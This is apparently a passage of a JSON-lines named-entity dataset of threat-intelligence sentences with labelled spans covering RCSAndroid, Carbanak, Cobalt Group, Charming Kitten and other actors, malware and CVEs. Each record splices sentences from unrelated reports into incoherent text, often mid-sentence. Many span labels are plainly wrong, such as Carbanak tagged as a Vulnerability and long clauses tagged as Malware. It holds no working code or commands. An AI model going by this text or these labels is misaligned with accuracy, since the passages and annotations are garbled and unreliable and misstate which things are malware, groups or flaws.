of a function obfuscated with control flow flattening has a loop structure starting with yellow-colored \u201c control flow dispatcher \u201d None Follow Microsoft recommendations to disable remote PowerShell for non - administrative users where possible .", "spans": [{"start": 31, "end": 41, "label": "Malware"}, {"start": 288, "end": 293, "label": "System"}, {"start": 296, "end": 304, "label": "System"}, {"start": 307, "end": 314, "label": "System"}, {"start": 317, "end": 323, "label": "System"}, {"start": 326, "end": 334, "label": "System"}, {"start": 337, "end": 341, "label": "System"}, {"start": 348, "end": 356, "label": "System"}, {"start": 409, "end": 414, "label": "System"}, {"start": 542, "end": 550, "label": "Vulnerability"}, {"start": 593, "end": 600, "label": "System"}, {"start": 618, "end": 627, "label": "Organization"}]} {"text": "messages from IM accounts , including Facebook Messenger , WhatsApp , Skype , Viber , Line , WeChat , Hangouts , Telegram , and BlackBerry Messenger . Symantec discovered the most recent wave of Tick attacks in July 2015 , when BRONZE BUTLER compromised three different Japanese websites with a Flash ( .swf ) exploit to mount watering hole attacks . like this , The series also touches on shocking new details unearthed by KrebsOnSecurity and Jeremy Bullock , a data scientist who worked with the show \u2019s producers at the Warner Bros. 
production company Wall to Wall Media .", "spans": [{"start": 38, "end": 56, "label": "System"}, {"start": 59, "end": 67, "label": "System"}, {"start": 70, "end": 75, "label": "System"}, {"start": 78, "end": 83, "label": "System"}, {"start": 86, "end": 90, "label": "System"}, {"start": 93, "end": 99, "label": "System"}, {"start": 102, "end": 110, "label": "System"}, {"start": 113, "end": 121, "label": "System"}, {"start": 128, "end": 148, "label": "System"}, {"start": 151, "end": 159, "label": "Organization"}, {"start": 228, "end": 241, "label": "Organization"}, {"start": 424, "end": 439, "label": "Organization"}, {"start": 444, "end": 458, "label": "Organization"}, {"start": 523, "end": 535, "label": "Organization"}, {"start": 555, "end": 573, "label": "Organization"}]} {"text": "Capture real-time voice calls in any network or app by hooking into the \u201c mediaserver \u201d system service RCSAndroid in the Wild Our analysis reveals that this RCSAndroid ( AndroidOS_RCSAgent.HRX ) has been in the wild since 2012 . In some cases , the attackers used the Society for Worldwide Interbank Financial Telecommunication ( SWIFT ) network to transfer money to their accounts . shown after the First Block . This sample works in tandem with PIEHOP , which sets up the execution .", "spans": [{"start": 103, "end": 113, "label": "Malware"}, {"start": 157, "end": 167, "label": "Malware"}, {"start": 170, "end": 192, "label": "Indicator"}, {"start": 249, "end": 258, "label": "Organization"}, {"start": 280, "end": 327, "label": "System"}, {"start": 330, "end": 335, "label": "System"}]} {"text": "Traces of its previous uses in the wild were found inside the configuration file : It was configured to use a Command-and-control ( C & C ) server in the United States ; however , the server was bought from a host service provider and is now unavailable . Carbanak is a backdoor used by the attackers to compromise the victim . 
The original code is separated into the orange-colored \u201c first block \u201d An internal data defense strategy requires prevention , detection and response capabilities .", "spans": [{"start": 256, "end": 264, "label": "Malware"}, {"start": 270, "end": 278, "label": "System"}, {"start": 291, "end": 300, "label": "Organization"}]} {"text": "It was configured to activate via SMS sent from a Czech Republic number . If found on the target system , Carbanak will try to exploit a known vulnerability in Windows XP , Windows Server 2003 , Windows Vista , Windows Server 2008 , Windows 7 , Windows 8 , and Windows Server 2012 , CVE-2013-3660 , for local privilege escalation . and green-colored flattened blocks . It is only when evaluating indicators of attack in the big picture , that the patterns of data collection and attempts to access the network start resembling an adversary with malicious intent .", "spans": [{"start": 106, "end": 114, "label": "Vulnerability"}, {"start": 283, "end": 296, "label": "Vulnerability"}, {"start": 396, "end": 416, "label": "Indicator"}, {"start": 530, "end": 561, "label": "Organization"}]} {"text": "Attackers can send SMS with certain messages to activate the agent and trigger corresponding action . To enable connections to the infected computer using the Remote Desktop Protocol ( RDP ) , Carbanak sets Termservice service execution mode to Auto . The analyst is then required to resolve the correct next block and modify the destination accordingly . The group also engaged in the theft of digital certificates which they then used to sign their malware to make them stealthier .", "spans": [{"start": 159, "end": 182, "label": "System"}, {"start": 185, "end": 188, "label": "System"}, {"start": 193, "end": 201, "label": "Vulnerability"}, {"start": 360, "end": 365, "label": "Organization"}]} {"text": "This can also define what kind of evidences to collect . 
Carbanak is also aware of the IFOBS banking application and can , on command , substitute the details of payment documents in the IFOBS system . The next portion of first block and each flattened block is decided by a \u201c block comparison variable \u201d Ransomware builders usually have a user interface that allows users to choose the underlying features and customize the configurations to build a new ransomware binary executable without exposing the source code or needing a compiler installed .", "spans": [{"start": 57, "end": 65, "label": "Vulnerability"}, {"start": 305, "end": 324, "label": "Malware"}, {"start": 333, "end": 548, "label": "Malware"}]} {"text": "Based on emails leaked in the dump , a number of Czech firms appear to be in business with the Hacking team , including a major IT partner in the Olympic Games . Sensitive bank documents have be found on the servers that were controlling Carbanak . with an immediate value . In most cases , the file is an Excel spreadsheet containing a VBA macro , but we also found four instances where a malicious PowerPoint OLE2 ( PPT ) file was used , possibly indicating the actor 's readiness to use file formats less commonly used in attacks .", "spans": [{"start": 238, "end": 246, "label": "Vulnerability"}, {"start": 295, "end": 346, "label": "Indicator"}, {"start": 390, "end": 423, "label": "Malware"}, {"start": 460, "end": 532, "label": "Indicator"}]} {"text": "Dropping Cluster Bombs RCSAndroid is a threat that works like a cluster bomb in that it deploys multiple dangerous exploits and uses various techniques to easily infect Android devices . Existing telemetry indicates that the Carbanak attackers are trying to expand operations to other Baltic and Central Europe countries , the Middle East , Asia and Africa . The value of the variable is assigned to a specific register in each block then compared in a control flow dispatcher and other condition blocks . 
The initial payloads and second stage backdoors were removed from the system .", "spans": [{"start": 23, "end": 33, "label": "Malware"}, {"start": 169, "end": 176, "label": "System"}, {"start": 225, "end": 233, "label": "Vulnerability"}, {"start": 234, "end": 243, "label": "Organization"}]} {"text": "While analyzing the code , we found that the whole system consists of four critical components , as follows : penetration solutions , ways to get inside the device , either via SMS/email or a legitimate app low-level native code , advanced exploits and spy tools beyond Android \u2019 s security framework high-level Java agent \u2013 the app \u2019 s malicious APK command-and-control ( C & C ) servers , used to remotely send/receive malicious commands Attackers use two methods to get targets to download RCSAndroid . FIN7 is a financially-motivated threat group that has been associated with malicious operations dating back to late 2015 . If the variable registers for the comparison and assignment are different , Therefore , there are cases where these vulnerabilities are accessible via the internet .", "spans": [{"start": 270, "end": 277, "label": "System"}, {"start": 493, "end": 503, "label": "Malware"}, {"start": 506, "end": 510, "label": "Organization"}, {"start": 538, "end": 550, "label": "Organization"}, {"start": 745, "end": 792, "label": "Vulnerability"}]} {"text": "The first method is to send a specially crafted URL to the target via SMS or email . As with previous campaigns , and as highlighted in our annual M-Trends 2017 report , FIN7 is calling stores at targeted organizations to ensure they received the email and attempting to walk them through the infection process . 
the assignment variable is called \u201c block update variable \u201d CrowdStrike security researchers were working to develop proof - of - concept ( POC ) code for an exploit method indicative of the logging present after recent Play ransomware attacks .", "spans": [{"start": 147, "end": 155, "label": "Organization"}, {"start": 170, "end": 174, "label": "Organization"}, {"start": 373, "end": 405, "label": "Organization"}, {"start": 533, "end": 556, "label": "Organization"}]} {"text": "The URL will trigger exploits for arbitrary memory read ( CVE-2012-2825 ) and heap buffer overflow ( CVE-2012-2871 ) vulnerabilities in the default browsers of Android versions 4.0 Ice Cream Sandwich to 4.3 Jelly Bean , allowing another local privilege escalation exploit to execute . We believe that the Carbanak campaign is a clear indicator of a new era in cybercrime in which criminals use APT techniques directly against the financial industry instead of through its customers . ( which is further explained later ) The sample of PIEHOP we obtained contains programming logic errors that prevent it from successfully performing its IEC-104 control capabilities , but we believe these errors can be easily corrected .", "spans": [{"start": 34, "end": 73, "label": "Vulnerability"}, {"start": 78, "end": 116, "label": "Vulnerability"}, {"start": 160, "end": 199, "label": "System"}, {"start": 203, "end": 217, "label": "System"}, {"start": 305, "end": 313, "label": "Vulnerability"}, {"start": 380, "end": 389, "label": "Organization"}, {"start": 430, "end": 448, "label": "Organization"}, {"start": 472, "end": 481, "label": "Organization"}, {"start": 563, "end": 665, "label": "Indicator"}]} {"text": "When root privilege is gained , a shell backdoor and malicious RCSAndroid agent APK file will be installed The second method is to use a stealthy backdoor app such as ANDROIDOS_HTBENEWS.A , which was designed to bypass Google Play . 
While FIN7 has embedded VBE as OLE objects for over a year , they continue to update their script launching mechanisms . . A careful analysis of the domain registrations from this threat actor between 2014 and 2015 allowed us to identify one profile used to register several domains that were used as C&C servers for a particular malware family employed by the Winnti group .", "spans": [{"start": 63, "end": 73, "label": "Malware"}, {"start": 167, "end": 187, "label": "Malware"}, {"start": 219, "end": 230, "label": "System"}, {"start": 239, "end": 243, "label": "Organization"}, {"start": 257, "end": 260, "label": "System"}, {"start": 356, "end": 606, "label": "Malware"}]} {"text": "The role of ANDROIDOS_HTBENEWS.A and the malicious APK mentioned in the first method is to exploit a local privilege escalation vulnerability in Android devices . This report describes the details and type of operations carried out by Carbanak that focuses on financial industry , such as payment providers , retail industry and PR companies . The algorithm looks straightforward however some portions of the code had to be modified in order to correctly deobfuscate the code . But as a new documentary series on Hulu reveals [ SPOILER ALERT ! ] , there was just one problem with that theory : Their top suspect had killed himself more than a year before the hackers began publishing stolen user data .", "spans": [{"start": 12, "end": 32, "label": "Malware"}, {"start": 101, "end": 141, "label": "Vulnerability"}, {"start": 235, "end": 243, "label": "Vulnerability"}, {"start": 260, "end": 278, "label": "Organization"}, {"start": 289, "end": 306, "label": "Organization"}, {"start": 309, "end": 324, "label": "Organization"}, {"start": 329, "end": 341, "label": "Organization"}, {"start": 513, "end": 517, "label": "Organization"}]} {"text": "Hacking Team has been known to use both CVE-2014-3153 and CVE-2013-6282 in their attacks . 
Carbanak has its origin in more common financial fraud including theft from consumer and corporate bank accounts in Europe and Russia , using standard banking malware , mainly Carberp . This is further detailed below . In 2009 , the Winnti group shifted to targeting gaming companies in South Korea using a self - named data- and file - stealing malware .", "spans": [{"start": 40, "end": 53, "label": "Vulnerability"}, {"start": 58, "end": 71, "label": "Vulnerability"}, {"start": 91, "end": 99, "label": "Vulnerability"}, {"start": 167, "end": 175, "label": "Organization"}, {"start": 267, "end": 274, "label": "System"}, {"start": 324, "end": 336, "label": "Organization"}, {"start": 358, "end": 374, "label": "Organization"}, {"start": 398, "end": 444, "label": "Malware"}]} {"text": "The said exploits will root the device and install a shell backdoor . The group has its origin in more common financial fraud including theft from consumer and corporate bank accounts in Europe and Russia , using standard banking malware , mainly Carberp . As previously detailed , Leveraging legitimate tools , publicly available malware , and livingofftheland tactics , MuddyWater focused on targeting Exchange Servers as part of a larger effort to deploy web shells and establish a backdoor within target networks .", "spans": [{"start": 74, "end": 79, "label": "Organization"}, {"start": 147, "end": 155, "label": "Organization"}, {"start": 247, "end": 254, "label": "System"}, {"start": 293, "end": 309, "label": "System"}, {"start": 312, "end": 338, "label": "Malware"}, {"start": 372, "end": 382, "label": "Organization"}, {"start": 404, "end": 420, "label": "System"}]} {"text": "The shell backdoor then installs the RCSAndroid agent . From 2013 Carbanak intensified its activity focused on banks and electronic payment systems in Russia and in the post-Soviet space . the original implementation of the code only works in MMAT_LOCOPT maturity level . 
Adversaries may manipulate physical process control within the industrial environment .", "spans": [{"start": 37, "end": 47, "label": "Malware"}, {"start": 66, "end": 74, "label": "Vulnerability"}, {"start": 111, "end": 116, "label": "Organization"}, {"start": 121, "end": 139, "label": "Organization"}, {"start": 181, "end": 186, "label": "Organization"}, {"start": 243, "end": 254, "label": "System"}]} {"text": "This agent has two core modules , the Evidence Collector and the Event Action Trigger . Since 2013 Carbanak has successfully gained access to networks of more than 50 banks and 5 payment systems . Rolles said this was to handle another obfuscation called \u201c Odd Stack Manipulations \u201d Russia has historically used self - proclaimed hacktivist groups as a means to obfuscate its role in operations against Western nations and it is plausible that Zarya or various pro - Russia hacktivists that have risen to prominence since Russia \u2019s invasion of Ukraine may either be cooperating or coordinating with , or a front for , the Russian security intelligence services .", "spans": [{"start": 99, "end": 107, "label": "Vulnerability"}, {"start": 167, "end": 172, "label": "Organization"}, {"start": 179, "end": 194, "label": "Organization"}, {"start": 312, "end": 347, "label": "Organization"}, {"start": 403, "end": 418, "label": "Organization"}, {"start": 444, "end": 449, "label": "Organization"}, {"start": 461, "end": 485, "label": "Organization"}, {"start": 622, "end": 660, "label": "Organization"}]} {"text": "The Evidence Collector module is responsible for the spying routines outlined above . The first successful bank robbery was committed by this group in January 2013 . 
, Anonymous Sudan accounted for 63 % of total identified DDoS attacks claimed by the KillNet collective in 2023 .", "spans": [{"start": 142, "end": 147, "label": "Organization"}, {"start": 168, "end": 183, "label": "Organization"}, {"start": 223, "end": 235, "label": "Organization"}, {"start": 251, "end": 269, "label": "Organization"}]} {"text": "One of its most notable routines is capturing voice calls in real time by hooking into the \u201c mediaserver \u201d system service . To reduce the risk of losing access to the internal bank network , the Carbanak , in addition to malicious programs , also used for remote access legitimate programs such as Ammy Admin and Team Viewer . referred in his blog ) None Use of open source libraries for protocol implementation : The availability of open source projects that implement OT protocols can lower the barrier of entry for actors attempting to interact with OT devices .", "spans": [{"start": 195, "end": 203, "label": "Vulnerability"}, {"start": 298, "end": 308, "label": "System"}, {"start": 313, "end": 324, "label": "System"}, {"start": 362, "end": 411, "label": "System"}, {"start": 434, "end": 482, "label": "System"}]} {"text": "The basic idea is to hook the voice call process in mediaserver . We have no evidence of compromises against banks in Western Europe or United States , but it should be noted that the attackers methods could be utilized against banks outside of Russia as well . . Given the evolving state of ransomware payout demands , government regulations are already underway to help public and private companies prevent and respond to ransomware attacks .", "spans": [{"start": 109, "end": 114, "label": "Organization"}, {"start": 184, "end": 193, "label": "Organization"}, {"start": 228, "end": 233, "label": "Organization"}, {"start": 372, "end": 400, "label": "Organization"}]} {"text": "Take voice call playback process for example . 
Additionally the reports on Carbanak show a different picture , where banks targeted outside of Russia , specifically Europe , USA and Japan are mentioned , which does not match our research . However the unflattening of ANEL code had to be performed in the later maturity level since the assignment of block comparison variable heavily depends on opaque predicates . The first script is the RAW data the retrieved from the JS file and the second one is the decoded one .", "spans": [{"start": 75, "end": 83, "label": "Vulnerability"}, {"start": 117, "end": 122, "label": "Organization"}, {"start": 268, "end": 272, "label": "Malware"}, {"start": 435, "end": 447, "label": "Indicator"}, {"start": 452, "end": 478, "label": "Indicator"}, {"start": 483, "end": 516, "label": "Indicator"}]} {"text": "The mediaserver will first builds a new unique track , start to play the track , loop play all audio buffer , then finally stop the playback . Without any insight into the evidence Kaspersky has obtained , we can only repeat our view that Anunak has targeted only banks in Russia and we have no concrete reports of compromised banks outside of Russia directly related to this criminal group . As an example in the following obfuscated function , Ready to learn more about Malwarebytes for Business ?", "spans": [{"start": 181, "end": 190, "label": "Organization"}, {"start": 239, "end": 245, "label": "Organization"}, {"start": 264, "end": 269, "label": "Organization"}, {"start": 327, "end": 332, "label": "Organization"}, {"start": 376, "end": 390, "label": "Organization"}, {"start": 472, "end": 497, "label": "System"}]} {"text": "The raw wave audio buffer frame can be dumped in the getNextBuffer ( ) function . Charming Kitten is an Iranian cyberespionage group operating since approximately 2014 . 
the v3 and v7 variables are assigned to the block comparison variable ( b_cmp ) Function has a couple of Anti debugging Anti Emulation checks .", "spans": [{"start": 82, "end": 97, "label": "Organization"}, {"start": 112, "end": 132, "label": "Organization"}, {"start": 275, "end": 289, "label": "System"}, {"start": 290, "end": 311, "label": "System"}]} {"text": "With the help of the open-source Android Dynamic Binary Instrumentation Toolkit and root privilege , it is possible to intercept any function execution . These attacks have included criminal groups responsible for the delivery of NewPosThings , MalumPOS and PoSeidon point of sale Malware , as well as Carbanak from the Russian criminal organization we track as Carbon Spider . . A Cl0p representative confirmed that they had been testing the vulnerability since July 2021 and that they had decided to deploy it over the Memorial Day weekend .", "spans": [{"start": 33, "end": 40, "label": "System"}, {"start": 182, "end": 197, "label": "Organization"}, {"start": 258, "end": 266, "label": "Organization"}, {"start": 302, "end": 310, "label": "Vulnerability"}, {"start": 328, "end": 349, "label": "Organization"}, {"start": 362, "end": 375, "label": "Organization"}, {"start": 382, "end": 386, "label": "Organization"}]} {"text": "The Event Action Trigger module triggers malicious actions based on certain events . The Charming Kitten' focus appears to be individuals of interest to Iran in the fields of academic research . However the values are dependent on opaque predicates results . 
Mandiant observed UNC4899 utilize various VPN providers as a final hop , the most common being ExpressVPN , but connections to NordVPN , TorGuard and many other providers have also been observed .", "spans": [{"start": 89, "end": 105, "label": "Organization"}, {"start": 175, "end": 192, "label": "Organization"}, {"start": 259, "end": 267, "label": "Organization"}, {"start": 277, "end": 284, "label": "Organization"}, {"start": 301, "end": 314, "label": "System"}, {"start": 354, "end": 364, "label": "System"}, {"start": 386, "end": 393, "label": "System"}, {"start": 396, "end": 404, "label": "System"}]} {"text": "These events can be based on time , charging or battery status , location , connectivity , running apps , focused app , SIM card status , SMS received with keywords , and screen turning on . Sometimes , they aim at establishing a foothold on the target 's computer to gain access into their organization , but , based on our data , this is usually not their main objective , as opposed to other Iranian threat groups , such as OilRig and CopyKittens . Once the opaque predicates are broken , Sandworm was first observed in the victim \u2019s environment in June 2022 , when the actor deployed the Neo - REGEORG webshell on an internet - facing server .", "spans": [{"start": 403, "end": 416, "label": "Organization"}, {"start": 427, "end": 433, "label": "Organization"}, {"start": 438, "end": 449, "label": "Organization"}, {"start": 492, "end": 500, "label": "Organization"}, {"start": 505, "end": 561, "label": "Indicator"}, {"start": 592, "end": 605, "label": "System"}, {"start": 621, "end": 645, "label": "System"}]} {"text": "According to the configuration pattern , these actions are registered to certain events : Sync configuration data , upgrade modules , and download new payload ( This uses transport protocol ZProtocol encrypted by AES/CBC/PKCS5Padding algorithm to communicate with the C & C server . 
Flying Kitten ( which is another name given by the security industry to Charming Kitten ) was one of the first groups to be described as a coherent threat actor conducting operations against political opponents of the IRI ( Islamic Republic of Iran ) government and foreign espionage targets . the loop code becomes simpler . What prompted the data scientist Bullock to reach out were gobs of anti - Semitic diatribes from Harrison , who had taken to labeling Biderman and others \u201c greedy Jew bastards . \u201d", "spans": [{"start": 283, "end": 296, "label": "Organization"}, {"start": 334, "end": 351, "label": "Organization"}, {"start": 355, "end": 370, "label": "Organization"}, {"start": 394, "end": 400, "label": "Organization"}, {"start": 431, "end": 443, "label": "Organization"}, {"start": 557, "end": 566, "label": "Organization"}, {"start": 642, "end": 649, "label": "Organization"}, {"start": 706, "end": 714, "label": "Organization"}, {"start": 743, "end": 751, "label": "Organization"}, {"start": 765, "end": 784, "label": "Organization"}]} {"text": ") Upload and purge collected evidence Destroy device by resetting locking password Execute shell commands Send SMS with defined content or location Disable network Disable root Uninstall bot To avoid detection and removal of the agent app in the device memory , the RCSAndroid suite also detects emulators or sandboxes , obfuscates code using DexGuard , uses ELF string obfuscator , and adjusts the OOM ( out-of-memory ) value . Flying Kitten was one of the first groups to be described as a coherent threat actor conducting operations against political opponents of government and foreign espionage targets . 
Unflattening the code in later maturity levels like MMAT_GLBOPT1 and MMAT_GLBOPT2 ( first and second pass of global optimization ) s determines offsets within files for encryption to control encryption speed .", "spans": [{"start": 266, "end": 276, "label": "Malware"}, {"start": 343, "end": 351, "label": "System"}, {"start": 429, "end": 442, "label": "Organization"}, {"start": 464, "end": 470, "label": "Organization"}, {"start": 501, "end": 513, "label": "Organization"}, {"start": 567, "end": 577, "label": "Organization"}, {"start": 590, "end": 599, "label": "Organization"}, {"start": 662, "end": 674, "label": "System"}, {"start": 679, "end": 691, "label": "System"}, {"start": 743, "end": 817, "label": "Indicator"}]} {"text": "Interestingly , one unused feature of the app is its ability to manipulate data in the Android package manager to add and remove permissions and components as well as hide the app icon . At certain times , Mesri has been a member of an Iran-based hacking group called the Turk Black Hat security team \" . caused additional problems . While COSMICENERGY \u2019s capabilities are not significantly different from previous OT malware families \u2019 , its discovery highlights several notable developments in the OT threat landscape .", "spans": [{"start": 87, "end": 94, "label": "System"}, {"start": 247, "end": 260, "label": "Organization"}, {"start": 272, "end": 286, "label": "Organization"}, {"start": 340, "end": 355, "label": "Malware"}, {"start": 415, "end": 434, "label": "Malware"}]} {"text": "Recommendations Popular mobile platforms like Android are common targets for organized or commercialized monitoring operations . During intense intelligence gathering over the last 24 months , we observed the technical capabilities of the Operation Cleaver team rapidly evolve faster than any previously observed Iranian effort . 
The unflattening algorithm requires mapping information between block comparison variable and the actual block number ( mblock_t : :s erial ) In 2009 , the Winnti group shifted to targeting gaming companies in South Korea using a self - named data- and file - stealing malware .", "spans": [{"start": 46, "end": 53, "label": "System"}, {"start": 239, "end": 256, "label": "Organization"}, {"start": 450, "end": 469, "label": "System"}, {"start": 486, "end": 498, "label": "Organization"}, {"start": 520, "end": 536, "label": "Organization"}, {"start": 560, "end": 606, "label": "Malware"}]} {"text": "Attackers know that rooting devices via malware exploits is an effective means to control devices and gather information from them . TinyZBot is a bot written in C# and developed by the Cleaver team . used in the microcode . While we can not validate these claims , there are indications that some of these documents are legitimate , which would demonstrate another significant increase in capability for the group .", "spans": [{"start": 133, "end": 141, "label": "System"}, {"start": 186, "end": 193, "label": "Organization"}, {"start": 293, "end": 331, "label": "Indicator"}]} {"text": "In a root broken device , security is a fairy tale . Some of the teams publicly known today include Iranian Cyber Army , Ashiyane , Islamic Cyber Resistance Group , Izz ad-Din al-Qassam Cyber Fighters , Parastoo , Shabgard , Iran Black Hats and many others 9 . 
In later maturity levels , Initial access was gained by compromising JumpCloud and inserting malicious code into their commands framework .", "spans": [{"start": 108, "end": 118, "label": "Organization"}, {"start": 121, "end": 129, "label": "Organization"}, {"start": 140, "end": 162, "label": "Organization"}, {"start": 165, "end": 200, "label": "Organization"}, {"start": 203, "end": 211, "label": "Organization"}, {"start": 214, "end": 222, "label": "Organization"}, {"start": 225, "end": 240, "label": "Organization"}, {"start": 330, "end": 339, "label": "Organization"}, {"start": 354, "end": 368, "label": "Malware"}]} {"text": "Take note of the following best practices to prevent this threat from getting in your device : Disable app installations from unknown , third-party sources . However , even though the TTPs of the Cleaver team have some overlap to techniques used by Iranian Cyber Army ( botnets ) , Ashiyane ( SQL injection ) and Syrian Electronic Army ( phishing ) , we believe this is largely the work of a new team . some blocks are deleted by the optimization after defeating opaque predicates , PBI Research Services also reported a data breach that exposed information for 4.75 million people .", "spans": [{"start": 196, "end": 203, "label": "Organization"}, {"start": 257, "end": 267, "label": "Organization"}, {"start": 282, "end": 290, "label": "Organization"}, {"start": 313, "end": 335, "label": "Organization"}, {"start": 483, "end": 504, "label": "Organization"}]} {"text": "Constantly update your Android devices to the latest version to help prevent exploits , especially in the case of RCSAndroid which can affect only up to version 4.4.4 KitKat . The Cobalt group 's traditional \" stomping grounds \" are the Eastern Europe , Central Asia , and Southeast Asia . which removes the mapping information . 
Most of the URLs and the infrastructure were not accessible at the time of analysis , although we managed to obtain images from three campaigns to recreate the infection chain .", "spans": [{"start": 23, "end": 30, "label": "System"}, {"start": 114, "end": 124, "label": "Malware"}, {"start": 161, "end": 173, "label": "System"}, {"start": 180, "end": 192, "label": "Organization"}, {"start": 342, "end": 346, "label": "System"}]} {"text": "Note , however , that based on the leak mail from a customer inquiry , Hacking Team was in the process of developing exploits for Android 5.0 Lollipop . Against targets in the CIS countries , the Cobalt also used their own infrastructure , which included rented dedicated servers . In the example below , The hackers behind the campaign have been identified as Tortoiseshell , which is believed to work on behalf of the Iranian government .", "spans": [{"start": 71, "end": 83, "label": "Organization"}, {"start": 130, "end": 150, "label": "System"}, {"start": 196, "end": 202, "label": "Organization"}, {"start": 309, "end": 316, "label": "Organization"}, {"start": 328, "end": 336, "label": "Organization"}, {"start": 361, "end": 374, "label": "Organization"}]} {"text": "Install a mobile security solution to secure your device from threats . In several cases , the Cobalt compromised company infrastructure and employee accounts in order to send phishing messages to partner companies in North and South America , Europe , CIS countries , and Central and Southeast Asia . the blue-highlighted immediate value 0x4624F47C is assigned to block comparison variable in the first block . In one exchange on Aug. 16 , 2012 , Ashley Madison \u2019s director of IT was asked to produce a list of all company employees with all - powerful administrator access .", "spans": [{"start": 95, "end": 101, "label": "Organization"}, {"start": 448, "end": 480, "label": "Organization"}]} {"text": "The leaked RCSAndroid code is a commercial weapon now in the wild . 
To ensure remote access to the workstation of an employee at a target organization , the Cobalt group ( as in previous years ) uses Beacon , a Trojan available as part of commercial penetration testing software . The mapping can be created by checking the conditional jump instruction ( jnz ) For these reasons , OT defenders and asset owners should take mitigating actions against COSMICENERGY to preempt in the wild deployment and to better understand common features and capabilities that are frequently deployed in OT malware .", "spans": [{"start": 11, "end": 26, "label": "Malware"}, {"start": 157, "end": 169, "label": "Organization"}, {"start": 200, "end": 206, "label": "System"}, {"start": 381, "end": 393, "label": "Organization"}, {"start": 398, "end": 410, "label": "Organization"}, {"start": 450, "end": 462, "label": "Malware"}, {"start": 587, "end": 597, "label": "Malware"}]} {"text": "Mobile users are called on to be on top of this news and be on guard for signs of monitoring . Artifacts indicated the involvement of the Cobalt that , according to Positive Technologies information , from August to October had performed similar successful attacks in Eastern Europe , and it 's likely that this group may will soon become active in the West . in MMAT_LOCOPT . 
Simultaneously , a threat researcher outside of CrowdStrike discovered an attacker \u2019s tooling via an open repository , downloaded all of the tools , and made them available through a MegaUpload link in a Twitter post.2", "spans": [{"start": 138, "end": 144, "label": "Organization"}, {"start": 174, "end": 198, "label": "Organization"}, {"start": 312, "end": 317, "label": "Organization"}, {"start": 363, "end": 374, "label": "System"}, {"start": 396, "end": 413, "label": "Organization"}, {"start": 425, "end": 436, "label": "Organization"}, {"start": 560, "end": 570, "label": "System"}, {"start": 581, "end": 588, "label": "System"}]} {"text": "Some indicators may come in the form of peculiar behavior such as unexpected rebooting , finding unfamiliar apps installed , or instant messaging apps suddenly freezing . In a recent spear-phishing campaign , the Cobalt Hacking Group used a remote code execution vulnerability in Microsoft Office software to connect to its command and control server via Cobalt Strike . Additionally here is no mapping information in MMAT_GLBOPT2 because the condition block that contains the variable has been deleted . The response of the initial sent packet knock contains some commands to be executed on the victim machine", "spans": [{"start": 213, "end": 233, "label": "Organization"}, {"start": 355, "end": 368, "label": "System"}, {"start": 418, "end": 430, "label": "System"}, {"start": 505, "end": 588, "label": "Malware"}, {"start": 596, "end": 610, "label": "Organization"}]} {"text": "Should a device become infected , this backdoor can not be removed without root privilege . The basic principles of targeted attacks on financial institutions have not changed since 2013 when the Anunak , Corkow , Buhtrap , and Lurk groups began conducting the first attacks on Russian banks . So the next block of the first one in the level can not be determined . 
Information about executed programs that violate one or more of these rules is recorded in the XProtect Database ( XPdb ) , which is stored in SQLite 3 format and located at /var / protected / xprotect / XPdb .", "spans": [{"start": 136, "end": 158, "label": "Organization"}, {"start": 196, "end": 202, "label": "Organization"}, {"start": 205, "end": 211, "label": "Organization"}, {"start": 214, "end": 221, "label": "Organization"}, {"start": 228, "end": 239, "label": "Organization"}, {"start": 286, "end": 291, "label": "Organization"}, {"start": 461, "end": 487, "label": "System"}, {"start": 499, "end": 574, "label": "Indicator"}]} {"text": "Users may be required the help of their device manufacturer to get support for firmware flashing . In a recent spear-phishing campaign , the Cobalt Group used a known CVE to connect to its C&C server via Cobalt Strike , but ended up revealing all targets . To resolve that issue , The messages show that Harrison was hired in March 2010 to help promote Ashley Madison online , but the messages also reveal Harrison was heavily involved in helping to create and cultivate phony female accounts on the service .", "spans": [{"start": 141, "end": 153, "label": "Organization"}, {"start": 204, "end": 217, "label": "System"}, {"start": 304, "end": 312, "label": "Organization"}, {"start": 353, "end": 367, "label": "Organization"}, {"start": 406, "end": 414, "label": "Organization"}]} {"text": "Trend Micro offers security for Android mobile devices through Mobile Security for Android\u2122 to protect against these types of attacks . This isn't the first time we've seen Cobalt makes this error\u2014back in March , an attack focussing on 1,880 targets across financial institutions in Kazakhstan had the same flaw . the code was written to link the block comparison variable and block address in MMAT_LOCOPT , But as a new documentary series on Hulu reveals [ SPOILER ALERT ! 
] , there was just one problem with that theory : Their top suspect had killed himself more than a year before the hackers began publishing stolen user data .", "spans": [{"start": 0, "end": 11, "label": "Organization"}, {"start": 32, "end": 39, "label": "System"}, {"start": 63, "end": 91, "label": "System"}, {"start": 173, "end": 179, "label": "Organization"}, {"start": 257, "end": 279, "label": "Organization"}, {"start": 394, "end": 405, "label": "System"}, {"start": 443, "end": 447, "label": "Organization"}]} {"text": "Find out more about the 7 Android Security Hacks You Need to Do Right Now to keep your mobile data safe . The Carbanak attacks targeting over a 100 financial institutions worldwide . as the block number is changed in each maturity level . For more information , contact : intelreports@kaspersky.comPowerShell event logs for the creation of an arbitrary process from PowerShell .", "spans": [{"start": 26, "end": 33, "label": "System"}, {"start": 148, "end": 170, "label": "Organization"}, {"start": 272, "end": 308, "label": "Organization"}, {"start": 366, "end": 376, "label": "System"}]} {"text": "Update as of July 23 , 2015 1:00 AM PDT ( UTC-7 ) We have added a link to a previous report discussing this threat . The leader of the crime gang behind the Carbanak and Cobalt malware attacks targeting over a 100 financial institutions worldwide has been arrested in Alicante , Spain , after a complex investigation conducted by the Spanish National Police . 
If the code can\u2019t determine the mapping in later maturity levels , It is thought they were likely targeted because they might have information on foreign policy of countries towards Iran , negotiations over Irans nuclear program , or information about Iranian dissidents .", "spans": [{"start": 135, "end": 145, "label": "Organization"}, {"start": 157, "end": 165, "label": "Vulnerability"}, {"start": 214, "end": 236, "label": "Organization"}, {"start": 542, "end": 546, "label": "Organization"}, {"start": 567, "end": 572, "label": "Organization"}, {"start": 612, "end": 632, "label": "Organization"}]} {"text": "Timeline of posts related to the Hacking Team DATE UPDATE July 5 The Italian company Hacking Team was hacked , with more than 400GB of confidential company data made available to the public . Since 2013 , the Cobalt have attempted to attack banks and financial institutions using pieces of malware they designed . it attempts to guess the next block number based on the address , This actor uses these vulnerabilities to deploy webshells including CHINACHOP .", "spans": [{"start": 85, "end": 97, "label": "Organization"}, {"start": 209, "end": 215, "label": "Organization"}, {"start": 241, "end": 246, "label": "Organization"}, {"start": 251, "end": 273, "label": "Organization"}, {"start": 448, "end": 457, "label": "Malware"}]} {"text": "July 7 Three exploits \u2013 two for Flash Player and one for the Windows kernel\u2014were 